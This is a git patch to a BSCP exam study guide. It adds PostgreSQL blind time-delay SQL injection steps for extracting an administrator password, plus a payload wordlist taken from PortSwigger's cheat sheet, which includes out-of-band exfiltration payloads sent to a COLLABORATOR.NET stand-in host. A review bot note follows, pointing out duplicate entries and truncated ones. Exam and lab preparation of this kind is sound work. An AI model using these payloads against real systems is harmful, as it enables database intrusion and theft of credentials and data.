From 13dcfa0fece4b8998cb8926493898f754eadd704 Mon Sep 17 00:00:00 2001 From: Juan Botes <52822072+botesjuan@users.noreply.github.com> Date: Tue, 21 Mar 2023 10:19:49 +0200 Subject: [PATCH] BSCP BSCP --- README.md | 12 +++-- wordlists/burp-sqli-cheatsheet-wordlist.txt | 57 +++++++++++++++++++++ 2 files changed, 65 insertions(+), 4 deletions(-) create mode 100644 wordlists/burp-sqli-cheatsheet-wordlist.txt diff --git a/README.md b/README.md index 3943c68..c77a042 100644 --- a/README.md +++ b/README.md @@ -656,7 +656,7 @@ location = "https://TARGET.net/?SearchTerm=%22%2d%65%76%61%6c%28%61%74%6f%62%28% ![(Deliver reflected xss to steal victim cookie.](images/xss1.png) ->**NOTE:** `Deliver exploit to victim` few times if the active user do not send HTTP request to collaborator. Replace the current cookie value with the stolen cookie to impersonate the active user and move on to [Stage 2 of the Practice Exam](#sqlmap). +>**NOTE:** `Deliver exploit to victim` few times if the active user do not send HTTP request to collaborator. Replace the current cookie value with the stolen cookie to impersonate the active user and move on to [Stage 2 of the Practice Exam](#blind-time-delay). [PortSwigger Practice Exam - Stage 1 - Foothold](https://portswigger.net/web-security/certification/takepracticeexam/index.html) 
@@ -1567,17 +1567,21 @@ csrf=TOKEN&username=administrator >Blind SQL injection with time delays is tricky to ***identify***, fuzzing involves educated guessing as OffSec also taught me in OSCP. The below payload will perform conditional case to delay the response by 10 seconds if positive SQL injection ***identified***. ->Identify SQLi vulnerability. +>Identify SQLi vulnerability. In [Burp Practice exam Stage 2](https://portswigger.net/web-security/certification/takepracticeexam/index.html) the advance search filters are vulnerable to `PostgreSQL`, but `SQLMAP` no longer since March 2023 able to identify and exploit the vulnerability. ```SQL ;SELECT CASE WHEN (1=1) THEN pg_sleep(7) ELSE pg_sleep(0) END-- +``` + +>[URL encoded](https://www.urlencoder.org/) `PostgreSQL` payload. +```SQL '%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(7)+ELSE+pg_sleep(0)+END-- ``` ->Determine how many characters are in the password of the administrator user. To do this, change the value to: +>Determine how many characters are in the password of the administrator user. To do this, increment the number after ` >1 ` conditional check. -```sql +```SQL ;SELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users-- ``` diff --git a/wordlists/burp-sqli-cheatsheet-wordlist.txt b/wordlists/burp-sqli-cheatsheet-wordlist.txt new file mode 100644 index 0000000..0954073 --- /dev/null +++ b/wordlists/burp-sqli-cheatsheet-wordlist.txt 
@@ -0,0 +1,57 @@
+PortSwigger SQL injection Cheat Sheet
+'foo'||'bar'
+'foo'+'bar'
+'foo'||'bar'
+'foo' 'bar'
+CONCAT('foo','bar')
+SUBSTR('foobar', 4, 2)
+SUBSTRING('foobar', 4, 2)
+SUBSTRING('foobar', 4, 2)
+SUBSTRING('foobar', 4, 2)
+--comment
+--comment
+/*comment*/
+--comment
+/*comment*/
+#comment
+-- comment
+/*comment*/
+SELECT banner FROM v$version
+SELECT version FROM v$instance
+SELECT @@version
+SELECT version()
+SELECT @@version
+SELECT * FROM all_tables
+SELECT * FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE'
+SELECT * FROM information_schema.tables
+SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'
+SELECT * FROM information_schema.tables
+SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'
+SELECT * FROM information_schema.tables
+SELECT * FROM information_schema.tables
+SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'
+SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN TO_CHAR(1/0) ELSE NULL END FROM dual
+SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/0 ELSE NULL END
+1 = (SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/(SELECT 0) ELSE NULL END)
+SELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM information_schema.tables),'a')
+QUERY-1-HERE; QUERY-2-HERE
+QUERY-1-HERE; QUERY-2-HERE
+QUERY-1-HERE; QUERY-2-HERE
+dbms_pipe.receive_message(('a'),10)
+WAITFOR DELAY '0:0:10'
+SELECT pg_sleep(10)
+SELECT SLEEP(10)
+SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual
+IF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10'
+SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN pg_sleep(10) ELSE pg_sleep(0) END
+SELECT IF(YOUR-CONDITION-HERE,SLEEP(10),'a')
+SELECT EXTRACTVALUE(xmltype(' %remote;]>'),'/l') FROM dual
+SELECT UTL_INADDR.get_host_address('COLLABORATOR.NET')
+exec master..xp_dirtree '//COLLABORATOR.NET/a'
+copy (SELECT '') to program 'nslookup COLLABORATOR.NET'
+LOAD_FILE('\\\\COLLABORATOR.NET\\a')
+SELECT ... 
INTO OUTFILE '\\\\COLLABORATOR.NET\a'
+SELECT EXTRACTVALUE(xmltype(' %remote;]>'),'/l') FROM dual
+declare @p varchar(1024);set @p=(SELECT YOUR-QUERY-HERE);exec('master..xp_dirtree "//'+@p+'.COLLABORATOR.NET/a"')
+SELECT YOUR-QUERY-HERE INTO OUTFILE '\\\\COLLABORATOR.NET\a'
+
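Review bot: The first line of the new wordlist, `PortSwigger SQL injection Cheat Sheet`, is a title rather than an entry, and the file ends with an empty line; anything that reads the file line by line will treat both as entries, so the title belongs in the README and the trailing blank line should be removed. Many entries are exact duplicates (`SUBSTRING('foobar', 4, 2)` three times, `SELECT * FROM information_schema.tables` four times, `QUERY-1-HERE; QUERY-2-HERE` three times, `--comment` and `/*comment*/` repeated), apparently because the cheat sheet's per-database rows were copied without the database column that distinguished them; since a plain wordlist has no comment syntax, either deduplicate the list or document the database per entry in the README. The two `SELECT EXTRACTVALUE(xmltype(' %remote;]>'),'/l') FROM dual` entries look truncated, as the text that should precede `%remote;` did not survive the copy, so as committed they are not well-formed and should be checked against the source or dropped. The `COLLABORATOR.NET` and `...-HERE` tokens are placeholders, which is worth stating in the README section that references this file.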